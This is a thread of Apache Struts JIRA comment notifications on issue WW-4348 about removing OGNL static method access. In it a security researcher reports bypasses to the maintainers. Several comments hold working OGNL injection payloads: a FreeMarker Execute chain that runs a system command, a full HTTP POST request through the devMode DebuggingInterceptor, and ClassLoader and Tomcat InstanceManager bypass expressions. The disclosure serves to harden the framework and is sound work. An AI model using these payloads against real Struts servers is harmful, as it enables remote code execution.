[jira] [Commented] (WW-4348) Remove access to static methods
[
https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16758069#comment-16758069
]
Lukasz Lenart commented on WW-4348:
---
I meant, you cannot use {{#application}} in a http request. You can use this
value only inside your code (in JSPs)
> Remove access to static methods
> ---
>
> Key: WW-4348
> URL: https://issues.apache.org/jira/browse/WW-4348
> Project: Struts 2
> Issue Type: Improvement
> Components: Core Actions
>Affects Versions: 2.3.16.3
>Reporter: Lukasz Lenart
>Priority: Critical
> Fix For: 2.5.x
>
>
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16751496#comment-16751496 ] Markus Wulftange commented on WW-4348: -- What do you mean by it gets blocked from outside? I have used the debugger in devMode like last time and it works that way. > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (WW-4348) Remove access to static methods
[
https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16748526#comment-16748526
]
Lukasz Lenart commented on WW-4348:
---
Yeah, but we block access to {{#application}} from outside
> Remove access to static methods
> ---
>
> Key: WW-4348
> URL: https://issues.apache.org/jira/browse/WW-4348
> Project: Struts 2
> Issue Type: Improvement
> Components: Core Actions
>Affects Versions: 2.3.16.3
>Reporter: Lukasz Lenart
>Priority: Critical
> Fix For: 2.5.x
>
>
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
[jira] [Commented] (WW-4348) Remove access to static methods
[
https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16747199#comment-16747199
]
Markus Wulftange commented on WW-4348:
--
Hi [~lukaszlenart], _freemarker.Configuration_ is no longer accessible and so
are _Class_ instances. So the mentioned examples won't work any more.
But, at least with Tomcat, there is
{noformat}
#application["org.apache.tomcat.InstanceManager"].newInstance("…"){noformat}
which can create arbitrary objects via the public argument-less constructor.
There are multiple classes that allow RCE that way.
> Remove access to static methods
> ---
>
> Key: WW-4348
> URL: https://issues.apache.org/jira/browse/WW-4348
> Project: Struts 2
> Issue Type: Improvement
> Components: Core Actions
>Affects Versions: 2.3.16.3
>Reporter: Lukasz Lenart
>Priority: Critical
> Fix For: 2.5.x
>
>
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16744994#comment-16744994 ] Lukasz Lenart commented on WW-4348: --- [~mwulftange] could you check with the latest 2.5.20 Struts version? > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (WW-4348) Remove access to static methods
[
https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15816378#comment-15816378
]
Markus Wulftange commented on WW-4348:
--
Here is also a _ClassLoader_ bypass:
{noformat}
#application['freemarker.Configuration']['newBuiltinClassResolver'].resolve('freemarker.template.Template',null,null)
{noformat}
> Remove access to static methods
> ---
>
> Key: WW-4348
> URL: https://issues.apache.org/jira/browse/WW-4348
> Project: Struts 2
> Issue Type: Improvement
> Components: Core Actions
>Affects Versions: 2.3.16.3
>Reporter: Lukasz Lenart
>Priority: Critical
> Fix For: 2.5.x
>
>
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15816136#comment-15816136 ] Markus Wulftange commented on WW-4348: -- Well, it works with the latest 2.5.8. > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[
https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15815957#comment-15815957
]
Lukasz Lenart commented on WW-4348:
---
[~mwulftange] but this doesn't work since Struts 2.3.20 as the new Internal
Security Mechanism blocks access to particular classes, in this case to
{{ClassLoader}}
http://struts.apache.org/docs/security.html#Security-Internalsecuritymechanism
> Remove access to static methods
> ---
>
> Key: WW-4348
> URL: https://issues.apache.org/jira/browse/WW-4348
> Project: Struts 2
> Issue Type: Improvement
> Components: Core Actions
>Affects Versions: 2.3.16.3
>Reporter: Lukasz Lenart
>Priority: Critical
> Fix For: 2.5.x
>
>
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[
https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15809959#comment-15809959
]
Markus Wulftange commented on WW-4348:
--
No, this can be specified where ever OGNL expressions are evaluated. For
example, [via the
DebuggingInterceptor|http://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/]:
{noformat}
POST /blank-1.0.0/example/HelloWorld.action HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 670
debug=command=%23application["freemarker.Configuration"]["objectWrapper"].newInstance(
%23context["com.opensymphony.xwork2.dispatcher.ServletContext"].classLoader.loadClass("freemarker.template.Template"),
{
%23application["freemarker.Configuration"]["objectWrapper"].wrap(""),
%23application["freemarker.Configuration"]["objectWrapper"].wrap("<%23assign+ex%3d\"freemarker.template.utility.Execute\"%3fnew()>${ex(\"xterm\")}"),
%23application["freemarker.Configuration"]["objectWrapper"].wrap(%23application["freemarker.Configuration"])
}
).process(
null,
%23context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].getWriter()
)
{noformat}
By the way, the given OGNL expression is equivalent to the following standalone
code:
{noformat}
new Template(
"",
"<#assign
ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"xterm\")}",
Configuration.getDefaultConfiguration()
).process(
null,
new PrintWriter(System.out)
);
{noformat}
> Remove access to static methods
> ---
>
> Key: WW-4348
> URL: https://issues.apache.org/jira/browse/WW-4348
> Project: Struts 2
> Issue Type: Improvement
> Components: Core Actions
>Affects Versions: 2.3.16.3
>Reporter: Lukasz Lenart
>Priority: Critical
> Fix For: 2.5.x
>
>
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15809899#comment-15809899 ] Lukasz Lenart commented on WW-4348: --- [~mwulftange] but as far I understand this must be defined as a template by developer on server side? > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[
https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15801069#comment-15801069
]
Markus Wulftange commented on WW-4348:
--
Disallowing static methods isn't sufficient. With access to FreeMarker's
_BeansWrapper_ instance, it is still possible to create an instance of any
class.
For example, by creating a FreeMarker _Template_ instance which utilizes the
_Execute_ utility, it is still possible to execute arbitrary commands:
{noformat}
#application["freemarker.Configuration"]["objectWrapper"].newInstance(
#context["com.opensymphony.xwork2.dispatcher.ServletContext"].classLoader.loadClass("freemarker.template.Template"),
{
#application["freemarker.Configuration"]["objectWrapper"].wrap(""),
#application["freemarker.Configuration"]["objectWrapper"].wrap("<#assign
ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"xterm\")}"),
#application["freemarker.Configuration"]["objectWrapper"].wrap(#application["freemarker.Configuration"])
}
).process(
null,
#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].getWriter()
)
{noformat}
> Remove access to static methods
> ---
>
> Key: WW-4348
> URL: https://issues.apache.org/jira/browse/WW-4348
> Project: Struts 2
> Issue Type: Improvement
> Components: Core Actions
>Affects Versions: 2.3.16.3
>Reporter: Lukasz Lenart
>Priority: Critical
> Fix For: 2.5.x
>
>
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15711283#comment-15711283 ] Lukasz Lenart commented on WW-4348: --- It's here to remind us about pass vulnerabilities around this functionality. And there is always a chance that we won't be able to fix them and the only option will be dropping it :( As for now we were good at solving the vulnerabilities and now it's safe to use it :) > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15711251#comment-15711251 ] Michael Krause commented on WW-4348: Oh good, that is very reassuring. Maybe you can set the resolution to something like 'Not a problem'? > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15709166#comment-15709166 ] Lukasz Lenart commented on WW-4348: --- Yeah.. we know that, that's why it hangs here ;-) > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15709039#comment-15709039 ] Michael Krause commented on WW-4348: Please do not 'fix' this 'bug'. Access to static methods is used in long-living enterprise applications all over the place. You will create a lot of work if you remove this feature. > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[
https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091051#comment-15091051
]
Lukasz Lenart commented on WW-4348:
---
Nope, by defining
{code:xml}
{code}
you'll enable access to static methods, setting {{false}} it'll be disabled.
But access to static methods was very often use as a hacker's attack vector on
users' applications. See PoC here http://struts.apache.org/docs/s2-009.html
> Remove access to static methods
> ---
>
> Key: WW-4348
> URL: https://issues.apache.org/jira/browse/WW-4348
> Project: Struts 2
> Issue Type: Improvement
> Components: Core Actions
>Affects Versions: 2.3.16.3
>Reporter: Lukasz Lenart
>Priority: Critical
> Fix For: 2.5
>
>
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091046#comment-15091046 ] victorsosa commented on WW-4348: So can I just add Into the config file so it start running the check?? > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5 > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091016#comment-15091016 ] victorsosa commented on WW-4348: This is already implemented, please check com.opensymphony.xwork2.ognl.OgnlUtil.setAllowStaticMethodAccess(String) you only need to set "struts.ognl.allowStaticMethodAccess" true > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5 > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091053#comment-15091053 ] victorsosa commented on WW-4348: OK so it need to be false > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5 > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091045#comment-15091045 ] Lukasz Lenart commented on WW-4348: --- Yes, the idea is to drop such functionality because it's a source of many security vulnerabilities. > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5 > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
